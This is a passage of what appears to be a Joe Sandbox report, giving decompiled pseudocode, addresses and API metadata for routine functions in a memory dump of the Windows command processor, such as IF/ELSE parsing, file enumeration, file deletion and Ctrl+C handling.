                                    																			E011E274C(0x1213d00, 0x104, L"%d",  *_t166);
                                    																			_push(0x1213d00);
                                    																			_push(1);
                                    																			_push(0x40002721);
                                    																			goto L75;
                                    																		}
                                    																	}
                                    																} else {
                                    																	L39:
                                    																	_t136 =  *_t166;
                                    																	_t93 = E011DDBCE(_t92,  *_t166);
                                    																	 *(_t166 + 8) = _t93;
                                    																	__eflags = _t93 - _t175;
                                    																	if(_t93 == _t175) {
                                    																		E011E274C(0x1213d00, 0x104, L"%d",  *_t166);
                                    																		_push(0x1213d00);
                                    																		_push(1);
                                    																		_push(0x2344);
                                    																		L75:
                                    																		E011DC5A2(_t136);
                                    																		 *(_t166 + 8) = _t104;
                                    																		E011DD937();
                                    																		goto L52;
                                    																	} else {
                                    																		E011DDB92( *_t166);
                                    																		L41:
                                    																		_t125 =  *(_t166 + 4);
                                    																		__eflags =  *_t125 - 0x26;
                                    																		if( *_t125 == 0x26) {
                                    																			 *((short*)(_t125 + 4)) = 0;
                                    																			_t149 =  *_t166;
                                    																			_t127 = (( *(_t166 + 4))[1] & 0x0000ffff) - 0x30;
                                    																			_t81 = E011DDBFC((( *(_t166 + 4))[1] & 0x0000ffff) - 0x30,  *_t166);
                                    																			__eflags = _t81 - _t175;
                                    																			if(_t81 != _t175) {
                                    																				goto L48;
                                    																			} else {
                                    																				goto L76;
                                    																			}
                                    																		} else {
                                    																			__eflags =  *((short*)(_t166 + 0x10)) - 0x3c;
                                    																			_push(_t125);
                                    																			if( *((short*)(_t166 + 0x10)) == 0x3c) {
                                    																				_t149 = 0x8000;
                                    																				_t85 = E011DD120(_t125, 0x8000);
                                    																				 *(_t180 - 0x224) = _t85;
                                    																				__eflags = _t85 - _t175;
                                    																				if(_t85 != _t175) {
                                    																					goto L45;
                                    																				} else {
                                    																					_t90 = E011E3320(L"DPATH");
                                    																					__eflags = _t90;
                                    																					if(_t90 == 0) {
                                    																						goto L77;
                                    																					} else {
                                    																						_t132 =  *(_t180 - 0x18);
                                    																						__eflags = _t132;
                                    																						if(_t132 == 0) {
                                    																							_t132 = _t180 - 0x220;
                                    																						}
                                    																						_t91 = SearchPathW(_t90,  *(_t166 + 4), _t104,  *(_t180 - 0x10), _t132, _t104);
                                    																						__eflags = _t91;
                                    																						if(_t91 == 0) {
                                    																							goto L77;
                                    																						} else {
                                    																							_t125 =  *(_t180 - 0x18);
                                    																							__eflags = _t125;
                                    																							if(_t125 == 0) {
                                    																								_t125 = _t180 - 0x220;
                                    																							}
                                    																							_push(_t125);
                                    																							_t149 = 0x8000;
                                    																							goto L44;
                                    																						}
                                    																					}
                                    																				}
                                    																			} else {
                                    																				asm("sbb edx, edx");
                                    																				_t149 = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
                                    																				__eflags = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
                                    																				L44:
                                    																				_t85 = E011DD120(_t125, _t149);
                                    																				 *(_t180 - 0x224) = _t85;
                                    																				__eflags = _t85 - _t175;
                                    																				if(_t85 == _t175) {
                                    																					L77:
                                    																					E011DD937();
                                    																					E011F985A( *0x1213cf0);
                                    																					goto L52;
                                    																				} else {
                                    																					L45:
                                    																					__eflags = _t85 -  *_t166;
                                    																					if(_t85 !=  *_t166) {
                                    																						_t149 =  *_t166;
                                    																						_t86 = E011DDBFC(_t85,  *_t166);
                                    																						_t127 =  *(_t180 - 0x224);
                                    																						_t177 = _t86;
                                    																						E011DDB92( *(_t180 - 0x224));
                                    																						__eflags = _t177 - 0xffffffff;
                                    																						if(_t177 == 0xffffffff) {
                                    																							L76:
                                    																							E011DD937();
                                    																							E011E274C(0x1213d00, 0x104, L"%d",  *_t166);
                                    																							E011DC5A2(_t127, 0x2344, 1, 0x1213d00);
                                    																							goto L52;
                                    																						} else {
                                    																							_t85 =  *_t166;
                                    																							_t175 = _t177 | 0xffffffff;
                                    																							goto L46;
                                    																						}
                                    																					} else {
                                    																						L46:
                                    																						__eflags = _t85 - _t175;
                                    																						if(_t85 == _t175) {
                                    																							goto L77;
                                    																						} else {
                                    																							 *( *(_t180 - 0x228) + 4) = _t85;
                                    																							goto L48;
                                    																						}
                                    																					}
                                    																				}
                                    																			}
                                    																		}
                                    																	}
                                    																}
                                    															}
                                    														}
                                    													}
                                    													goto L49;
                                    													L48:
                                    													_t76 =  *(_t166 + 0x14);
                                    													_t166 = _t76;
                                    													__eflags = _t76;
                                    												} while (_t76 != 0);
                                    											}
                                    										}
                                    									}
                                    									L49:
                                    									__imp__??_V@YAXPAX@Z( *(_t180 - 0x18));
                                    									_pop(_t167);
                                    									_pop(_t174);
                                    									__eflags =  *(_t180 - 4) ^ _t180;
                                    									_pop(_t105);
                                    									return E011E6FD0(_t104, _t105,  *(_t180 - 4) ^ _t180, _t149, _t167, _t174);
                                    									goto L78;
                                    								}
                                    							} else {
                                    								 *(_t171 + 0x44) = _t68;
                                    								E011E1040(_t68,  *0x120fa8c, 0x120faa0);
                                    								_t144 = 0x2c;
                                    								_t100 = E011DDC74(_t104, _t144);
                                    								 *(_t171 + 0x48) = _t100;
                                    								__eflags = _t100;
                                    								if(_t100 == 0) {
                                    									E011F82EB(_t144);
                                    								}
                                    								goto L13;
                                    							}
                                    						} else {
                                    							E011DF300(_t66, 0, 0, 0);
                                    							goto L13;
                                    						}
                                    					}
                                    				}
                                    				L78:
                                    			}

                                    0x011dda10
                                    0x011dda14
                                    0x011dda19
                                    0x011dda1c
                                    0x011dda1e
                                    0x011dda21
                                    0x011dda23
                                    0x011dda26
                                    0x011dda26
                                    0x011dda29
                                    0x011dda2c
                                    0x011dda2c
                                    0x011dda35
                                    0x011dda36
                                    0x011dda39
                                    0x011dda3b
                                    0x011dda40
                                    0x00000000
                                    0x00000000
                                    0x011dda40
                                    0x011dda39
                                    0x011dda1c
                                    0x011dda4f
                                    0x011dda55
                                    0x011dda5b
                                    0x011dda5e
                                    0x011eba31
                                    0x011eba36
                                    0x00000000
                                    0x011dda64
                                    0x011dda66
                                    0x011dda67
                                    0x011dda6c
                                    0x011dda72
                                    0x011dda74
                                    0x011ddb8d
                                    0x011ddb8f
                                    0x011dda7a
                                    0x011dda80
                                    0x011dda83
                                    0x011dda88
                                    0x011dda8b
                                    0x011dda8d
                                    0x011dda8d
                                    0x011dda90
                                    0x011dda92
                                    0x011dda98
                                    0x011dda98
                                    0x011dda9b
                                    0x011dda9b
                                    0x011dda9e
                                    0x00000000
                                    0x011ddaa4
                                    0x011ddaa6
                                    0x011ddaad
                                    0x011ddaaf
                                    0x011eba90
                                    0x011eba90
                                    0x00000000
                                    0x011ddab5
                                    0x011ddab7
                                    0x011ddabe
                                    0x011ddac1
                                    0x00000000
                                    0x011ddac7
                                    0x011ddac9
                                    0x011ddace
                                    0x011ddad0
                                    0x011eba43
                                    0x011eba48
                                    0x011eba4a
                                    0x00000000
                                    0x011eba50
                                    0x011eba56
                                    0x011eba5c
                                    0x011eba5e
                                    0x011eba64
                                    0x011eba66
                                    0x00000000
                                    0x011eba6c
                                    0x011eba7e
                                    0x011eba83
                                    0x011eba84
                                    0x011eba86
                                    0x00000000
                                    0x011eba86
                                    0x011eba66
                                    0x011ddad6
                                    0x011ddad6
                                    0x011ddad6
                                    0x011ddad8
                                    0x011ddadd
                                    0x011ddae0
                                    0x011ddae2
                                    0x011ebb36
                                    0x011ebb3b
                                    0x011ebb3c
                                    0x011ebb3e
                                    0x011ebb43
                                    0x011ebb43
                                    0x011ebb4b
                                    0x011ebb4e
                                    0x00000000
                                    0x011ddae8
                                    0x011ddaea
                                    0x011ddaef
                                    0x011ddaef
                                    0x011ddaf2
                                    0x011ddaf6
                                    0x011ddb6f
                                    0x011ddb76
                                    0x011ddb7c
                                    0x011ddb7f
                                    0x011ddb84
                                    0x011ddb86
                                    0x00000000
                                    0x011ddb88
                                    0x00000000
                                    0x011ddb88
                                    0x011ddaf8
                                    0x011ddaf8
                                    0x011ddafd
                                    0x011ddafe
                                    0x011eba98
                                    0x011eba9d
                                    0x011ebaa2
                                    0x011ebaa8
                                    0x011ebaaa
                                    0x00000000
                                    0x011ebab0
                                    0x011ebab5
                                    0x011ebaba
                                    0x011ebabc
                                    0x00000000
                                    0x011ebac2
                                    0x011ebac2
                                    0x011ebac5
                                    0x011ebac7
                                    0x011ebac9
                                    0x011ebac9
                                    0x011ebad9
                                    0x011ebadf
                                    0x011ebae1
                                    0x00000000
                                    0x011ebae7
                                    0x011ebae7
                                    0x011ebaea
                                    0x011ebaec
                                    0x011ebaee
                                    0x011ebaee
                                    0x011ebaf4
                                    0x011ebaf5
                                    0x00000000
                                    0x011ebaf5
                                    0x011ebae1
                                    0x011ebabc
                                    0x011ddb04
                                    0x011ddb09
                                    0x011ddb11
                                    0x011ddb11
                                    0x011ddb17
                                    0x011ddb17
                                    0x011ddb1c
                                    0x011ddb22
                                    0x011ddb24
                                    0x011ebb89
                                    0x011ebb89
                                    0x011ebb94
                                    0x00000000
                                    0x011ddb2a
                                    0x011ddb2a
                                    0x011ddb2a
                                    0x011ddb2c
                                    0x011ebaff
                                    0x011ebb03
                                    0x011ebb08
                                    0x011ebb0e
                                    0x011ebb10
                                    0x011ebb15
                                    0x011ebb18
                                    0x011ebb58
                                    0x011ebb58
                                    0x011ebb6f
                                    0x011ebb7c
                                    0x00000000
                                    0x011ebb1a
                                    0x011ebb1a
                                    0x011ebb1c
                                    0x00000000
                                    0x011ebb1c
                                    0x011ddb32
                                    0x011ddb32
                                    0x011ddb32
                                    0x011ddb34
                                    0x00000000
                                    0x011ddb3a
                                    0x011ddb40
                                    0x00000000
                                    0x011ddb40
                                    0x011ddb34
                                    0x011ddb2c
                                    0x011ddb24
                                    0x011ddafe
                                    0x011ddaf6
                                    0x011ddae2
                                    0x011ddad0
                                    0x011ddac1
                                    0x011ddaaf
                                    0x00000000
                                    0x011ddb43
                                    0x011ddb43
                                    0x011ddb46
                                    0x011ddb48
                                    0x011ddb48
                                    0x011dda9b
                                    0x011dda92
                                    0x011dda74
                                    0x011ddb50
                                    0x011ddb53
                                    0x011ddb5f
                                    0x011ddb60
                                    0x011ddb61
                                    0x011ddb63
                                    0x011ddb6c
                                    0x00000000
                                    0x011ddb6c
                                    0x011dd8f2
                                    0x011dd8fb
                                    0x011dd8fe
                                    0x011dd905
                                    0x011dd906
                                    0x011dd90b
                                    0x011dd90e
                                    0x011dd910
                                    0x011dd912
                                    0x011dd912
                                    0x00000000
                                    0x011dd910
                                    0x011dd8cc
                                    0x011dd8d2
                                    0x00000000
                                    0x011dd8d2
                                    0x011dd8ca
                                    0x011dd8ac
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: ELSE$IF/?
                                    • API String ID: 2081463915-1134991328
                                    • Opcode ID: 68a0f3e7eae79cc145230987cefb0f45493876cc411bb7c70aa7adaa811b6650
                                    • Instruction ID: 01e8e261cb7174a619d56f4466216fa1e6c1f387d95cdb2cf1748a6716eb0334
                                    • Opcode Fuzzy Hash: 68a0f3e7eae79cc145230987cefb0f45493876cc411bb7c70aa7adaa811b6650
                                    • Instruction Fuzzy Hash: 7C61E1316006029BEF3EDBB9B859A2ABBE1AF94224B14452ED506D72D0EF71D881C740
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 54%
                                    			E011E68BA(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16) {
                                    				signed int _v8;
                                    				intOrPtr* _v12;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t18;
                                    				void* _t22;
                                    				void* _t24;
                                    				int _t28;
                                    				void* _t40;
                                    				void* _t41;
                                    				void* _t47;
                                    				void* _t50;
                                    				void* _t51;
                                    				void** _t53;
                                    				void* _t54;
                                    				signed int _t55;
                                    
                                    				_t48 = __edx;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t18 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t18 ^ _t55;
                                    				_v12 = __ecx;
                                    				_t40 = 0;
                                    				_t22 = FindFirstFileExW(__edx, 0 | _a8 == 0x00000000, _a12, 0, 0, 2);
                                    				_t53 = _a16;
                                    				_t50 = _t22;
                                    				 *_t53 = _t50;
                                    				while(_t50 != 0xffffffff) {
                                    					_push(_a4);
                                    					_push(_a12);
                                    					if(_v12 != E011E6A00) {
                                    						 *0x12194b4();
                                    						_t28 =  *_v12();
                                    						_t50 =  *_t53;
                                    					} else {
                                    						_t28 = E011E6A00();
                                    					}
                                    					if(_t28 == 0) {
                                    						if(FindNextFileW(_t50, _a12) == 0) {
                                    							FindClose( *_t53);
                                    							 *_t53 =  *_t53 | 0xffffffff;
                                    							_t50 = _t50 | 0xffffffff;
                                    							goto L6;
                                    						} else {
                                    							_t50 =  *_t53;
                                    							continue;
                                    						}
                                    					} else {
                                    						 *0x1213cf0 =  *0x1213cf0 & 0x00000000;
                                    						_t40 = 1;
                                    						L6:
                                    						if(_t50 == 0xffffffff) {
                                    							L12:
                                    							if(_t40 == 0) {
                                    								break;
                                    							}
                                    							L13:
                                    							_t24 = _t40;
                                    						} else {
                                    							_t47 =  *0x1213cf4;
                                    							if(_t47 == 0) {
                                    								_t47 = HeapAlloc(GetProcessHeap(), 0, 0x14);
                                    								goto L17;
                                    							} else {
                                    								_t48 =  *0x11fd5dc; // 0x0
                                    								if(_t48 >=  *0x1213cf8) {
                                    									_t47 = HeapReAlloc(GetProcessHeap(), 0, _t47, 4 + _t48 * 4);
                                    									if(_t47 == 0) {
                                    										 *0x1213cf0 = GetLastError();
                                    										FindClose( *_t53);
                                    										 *_t53 =  *_t53 | 0xffffffff;
                                    										_t24 = 0;
                                    									} else {
                                    										 *0x1213cf8 =  *0x1213cf8 + 1;
                                    										L17:
                                    										_t48 =  *0x11fd5dc; // 0x0
                                    										 *0x1213cf4 = _t47;
                                    										goto L9;
                                    									}
                                    								} else {
                                    									L9:
                                    									if(_t47 != 0) {
                                    										 *(_t47 + _t48 * 4) =  *_t53;
                                    										 *0x11fd5dc = _t48;
                                    									}
                                    									_t40 = 1;
                                    									goto L12;
                                    								}
                                    							}
                                    						}
                                    					}
                                    					_pop(_t51);
                                    					_pop(_t54);
                                    					_pop(_t41);
                                    					return E011E6FD0(_t24, _t41, _v8 ^ _t55, _t48, _t51, _t54);
                                    				}
                                    				 *0x1213cf0 = GetLastError();
                                    				goto L13;
                                    			}





















                                    APIs
                                    • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,011E6A00,011E6A00,?,011DAE4F,00000037,00000000,?), ref: 011E68E6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,011DAE4F,00000037,00000000,?,?), ref: 011E696A
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,011DAE4F,00000037,00000000,?,?), ref: 011E697B
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E6982
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E69B7
                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E69BE
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000037,?,011DAE4F,00000037,00000000,?,?), ref: 011E69DA
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(011DAE4F,?,011DAE4F,00000037,00000000,?,?), ref: 011E69ED
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$Find$AllocFileProcess$CloseErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 1047556133-0
                                    • Opcode ID: bd5055c26d6986c4d7791438e641f8d8d6467a4814b4cdb1aa0cb1cfe8dd3354
                                    • Instruction ID: 715a1d092b3117166d7c9ed6ac7227bf96f2bc474ed480485811791da40d26ed
                                    • Opcode Fuzzy Hash: bd5055c26d6986c4d7791438e641f8d8d6467a4814b4cdb1aa0cb1cfe8dd3354
                                    • Instruction Fuzzy Hash: 8541B270600601AFDF28CFA9E81DAA97BF9FB65325F51462CE992C7294EF309841CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E011D83F2(WCHAR* __ecx, signed int __edx) {
                                    				void* _v8;
                                    				void* _v16;
                                    				void* _v24;
                                    				long _v32;
                                    				char _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				void* _v64;
                                    				struct _EXCEPTION_RECORD _t30;
                                    				long _t31;
                                    				long _t35;
                                    				WCHAR* _t41;
                                    				char* _t43;
                                    				long _t47;
                                    				void* _t49;
                                    
                                    				_t47 = 0;
                                    				_t41 = __ecx;
                                    				if((__edx & 0x00000400) != 0) {
                                    					L11:
                                    					if(DeleteFileW(_t41) == 0) {
                                    						_t47 = GetLastError();
                                    					}
                                    					L8:
                                    					return _t47;
                                    				}
                                    				_v8 = _v8 | 0xffffffff;
                                    				_t30 =  &_v16;
                                    				__imp__RtlDosPathNameToRelativeNtPathName_U_WithStatus(__ecx, _t30, 0,  &_v40);
                                    				if(_t30 < 0) {
                                    					goto L11;
                                    				}
                                    				if(_v40 > 0) {
                                    					_t31 = _v32;
                                    					_t43 =  &_v40;
                                    				} else {
                                    					_t31 = 0;
                                    					_t43 =  &_v16;
                                    					_v32 = 0;
                                    				}
                                    				_v60 = _t31;
                                    				_v64 = 0x18;
                                    				_v52 = 0x40;
                                    				_v56 = _t43;
                                    				_v48 = _t47;
                                    				_v44 = _t47;
                                    				_t35 = NtOpenFile( &_v8, 0x10000,  &_v64,  &_v24, 4, 0x5040);
                                    				__imp__RtlReleaseRelativeName( &_v40);
                                    				RtlFreeUnicodeString( &_v16);
                                    				if(_t35 < 0) {
                                    					goto L11;
                                    				} else {
                                    					if(E011D84BE(_v8) != 0) {
                                    						_t49 = E011F9AB4(_v8);
                                    					} else {
                                    						_t49 = 1;
                                    					}
                                    					CloseHandle(_v8);
                                    					if(_t49 == 0) {
                                    						goto L11;
                                    					} else {
                                    						goto L8;
                                    					}
                                    				}
                                    			}






















                                    APIs
                                    • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 011D841B
                                    • NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 011D846D
                                    • RtlReleaseRelativeName.NTDLL(?), ref: 011D8479
                                    • RtlFreeUnicodeString.NTDLL(?), ref: 011D8483
                                      • Part of subcall function 011D84BE: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 011D84EA
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 011D84A7
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000001), ref: 011F036E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,011D8393), ref: 011F037C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                    • String ID: @
                                    • API String ID: 2968197161-2766056989
                                    • Opcode ID: 15b906fcc33d32b35945597303889ee1e0c275476096b7cf534ee7bb332ef71e
                                    • Instruction ID: 68ca3638a004b323041b77d24e8829d245a3f3a9f4afba082227942518c7f86b
                                    • Opcode Fuzzy Hash: 15b906fcc33d32b35945597303889ee1e0c275476096b7cf534ee7bb332ef71e
                                    • Instruction Fuzzy Hash: 1E2162B1D00209AFDF24DFA5E948AEFBBBDEB58654F114169FA11E3241DB309E04CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 31%
                                    			E011F6D90(void* __edi, intOrPtr _a4) {
                                    				char _v12;
                                    				void* __ecx;
                                    				int _t4;
                                    				void* _t6;
                                    				void* _t7;
                                    				struct _IO_FILE* _t10;
                                    				void* _t13;
                                    				void* _t16;
                                    
                                    				_t16 = __edi;
                                    				_push(_t13);
                                    				_push(_t13);
                                    				if(_a4 == 0 || _a4 == 1) {
                                    					EnterCriticalSection( *0x1203858);
                                    					 *0x11fd544 = 1;
                                    					LeaveCriticalSection( *0x1203858);
                                    					if( *0x11fd0db != 0 &&  *0x1213cc4 != 0) {
                                    						_push("^C");
                                    						_t10 = E011E7721(_t4, 2);
                                    						_pop(_t13);
                                    						_t4 = fflush(E011E7721(fprintf(_t10, ??), 2));
                                    					}
                                    					if( *0x120b938 != 0xffffffff) {
                                    						__imp__TryAcquireSRWLockExclusive(0x1217f20, _t16);
                                    						if(_t4 != 0) {
                                    							__imp__NtCancelSynchronousIoFile( *0x120b938, 0,  &_v12);
                                    							__imp__ReleaseSRWLockExclusive(0x1217f20);
                                    						}
                                    					}
                                    					if(E011E7797(_t13) == 0) {
                                    						_t7 = E011E0178(_t5);
                                    						if(_t7 != 0) {
                                    							__imp___get_osfhandle(0);
                                    							FlushConsoleInputBuffer(_t7);
                                    						}
                                    					}
                                    					_t6 = 1;
                                    				} else {
                                    					_t6 = 0;
                                    				}
                                    				return _t6;
                                    			}











                                    APIs
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F6DB3
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F6DC5
                                    • fprintf.MSVCRT ref: 011F6DEB
                                    • fflush.MSVCRT ref: 011F6DF9
                                    • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F6E12
                                    • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 011F6E28
                                    • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F6E2F
                                    • _get_osfhandle.MSVCRT ref: 011F6E4C
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 011F6E54
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                    • String ID:
                                    • API String ID: 3139166086-0
                                    • Opcode ID: 8b21a91cf073ce9918c0a9012cb838c880f2aa71c4b275b82131f258d6e2289a
                                    • Instruction ID: 0d3a2d669b8a8a62280d232c0a5f64d16cf12eef3b7968ab26f4f3de8064f518
                                    • Opcode Fuzzy Hash: 8b21a91cf073ce9918c0a9012cb838c880f2aa71c4b275b82131f258d6e2289a
                                    • Instruction Fuzzy Hash: F211B132A40210AFEF39EFA8F85DBAA7F68EB64B19F04011DF605911D6CB7144C1C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 92%
                                    			E011E5FC8(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, WCHAR* _a12, signed int _a16, intOrPtr* _a20, intOrPtr* _a24) {
                                    				signed int _v8;
                                    				int _v20;
                                    				char _v24;
                                    				int _v28;
                                    				void _v548;
                                    				intOrPtr _v552;
                                    				int _v556;
                                    				intOrPtr* _v560;
                                    				WCHAR* _v564;
                                    				intOrPtr* _v568;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t84;
                                    				short _t95;
                                    				short _t97;
                                    				void* _t98;
                                    				intOrPtr _t100;
                                    				signed int _t112;
                                    				signed int _t113;
                                    				long _t118;
                                    				signed int _t120;
                                    				void* _t121;
                                    				short _t122;
                                    				signed char _t124;
                                    				void* _t125;
                                    				long _t126;
                                    				void* _t127;
                                    				short _t128;
                                    				long _t136;
                                    				signed short* _t137;
                                    				short _t146;
                                    				short _t147;
                                    				void* _t148;
                                    				signed int _t150;
                                    				signed int _t153;
                                    				signed int _t154;
                                    				signed int _t155;
                                    				short _t156;
                                    				signed int _t161;
                                    				WCHAR* _t162;
                                    				intOrPtr* _t163;
                                    				short* _t169;
                                    				long _t170;
                                    				short* _t171;
                                    				signed int _t177;
                                    				short _t178;
                                    				WCHAR* _t182;
                                    				WCHAR* _t183;
                                    				signed int _t187;
                                    				WCHAR* _t188;
                                    				WCHAR* _t199;
                                    				short* _t202;
                                    				void* _t205;
                                    				signed int _t206;
                                    				signed int _t208;
                                    				signed int _t209;
                                    				signed int _t210;
                                    				long _t219;
                                    				signed int _t220;
                                    				void* _t222;
                                    				void* _t223;
                                    				short _t227;
                                    				void* _t228;
                                    				WCHAR* _t229;
                                    				void* _t232;
                                    				WCHAR* _t233;
                                    				signed int _t235;
                                    				intOrPtr* _t239;
                                    				short* _t241;
                                    				void* _t242;
                                    				WCHAR* _t244;
                                    				signed int _t246;
                                    				short* _t248;
                                    				WCHAR* _t250;
                                    				signed int _t251;
                                    				signed int _t252;
                                    				WCHAR* _t254;
                                    				void* _t258;
                                    				intOrPtr _t259;
                                    				signed int _t260;
                                    
                                    				_t84 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t84 ^ _t260;
                                    				_v552 = _a4;
                                    				_v564 = _a12;
                                    				_v560 = _a20;
                                    				_t232 = __edx;
                                    				_v568 = _a24;
                                    				E011E62FA(E011E3320(L"COPYCMD"), _t232);
                                    				_v556 = 0;
                                    				_t162 = E011DEA40( *((intOrPtr*)(__ecx + 0x3c)), 0, 0);
                                    				if(E011E62FA(_t162, _t232) == 0) {
                                    					L2:
                                    					_t250 = _t162;
                                    					_t217 = 0;
                                    					_t12 =  &(_t250[1]); // 0x0
                                    					_t169 = _t12;
                                    					do {
                                    						_t95 =  *_t250;
                                    						_t250 =  &(_t250[1]);
                                    					} while (_t95 != 0);
                                    					_t251 = _t250 - _t169;
                                    					_t252 = _t251 >> 1;
                                    					if(_t251 == 0) {
                                    						L46:
                                    						_t170 = 0x232a;
                                    						L48:
                                    						L011F5CEA(_t162, _t170, _t217, __eflags);
                                    						L49:
                                    						_t170 = 0x232e;
                                    						goto L48;
                                    					}
                                    					if(_t252 >= 0x7fe7) {
                                    						goto L49;
                                    					}
                                    					_t233 = _t162;
                                    					_t13 =  &(_t233[1]); // 0x0
                                    					_t171 = _t13;
                                    					do {
                                    						_t97 =  *_t233;
                                    						_t233 =  &(_t233[1]);
                                    					} while (_t97 != 0);
                                    					_t235 = _t233 - _t171 >> 1;
                                    					_t98 = E011E22C0(_t162, _t162);
                                    					_t14 = _t235 + 1; // -3
                                    					_t217 = _t14;
                                    					E011E1040(_t162, _t14, _t98);
                                    					_t100 = E011E3B5D(_t162, _t14);
                                    					 *_v560 = _t100;
                                    					if(_t100 == 1) {
                                    						_t170 =  *0x1213cf0;
                                    						goto L48;
                                    					}
                                    					_v24 = 1;
                                    					_v28 = 0;
                                    					_v20 = 0x104;
                                    					memset( &_v548, 0, 0x104);
                                    					if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    						_t170 = 0x2374;
                                    						goto L48;
                                    					}
                                    					_t254 =  &(_t162[_t252 + 1]);
                                    					if( *_t254 == 0) {
                                    						_t177 = _v28;
                                    						__eflags = _t177;
                                    						if(_t177 == 0) {
                                    							_t177 =  &_v548;
                                    						}
                                    						 *_t177 =  *((intOrPtr*)( *0x1213cec));
                                    						_t112 = _v28;
                                    						__eflags = _t112;
                                    						if(_t112 == 0) {
                                    							_t112 =  &_v548;
                                    						}
                                    						_t178 = 0x3a;
                                    						 *((short*)(_t112 + 2)) = _t178;
                                    						_t113 = _v28;
                                    						__eflags = _t113;
                                    						if(_t113 == 0) {
                                    							_t113 =  &_v548;
                                    						}
                                    						 *((short*)(_t113 + 4)) = 0;
                                    						L19:
                                    						_t238 = _a8;
                                    						_t217 = _a8;
                                    						_t255 = _v552;
                                    						if(E011E2D22(_v552, _t238, _t162) != 0) {
                                    							goto L49;
                                    						}
                                    						_t163 = _v560;
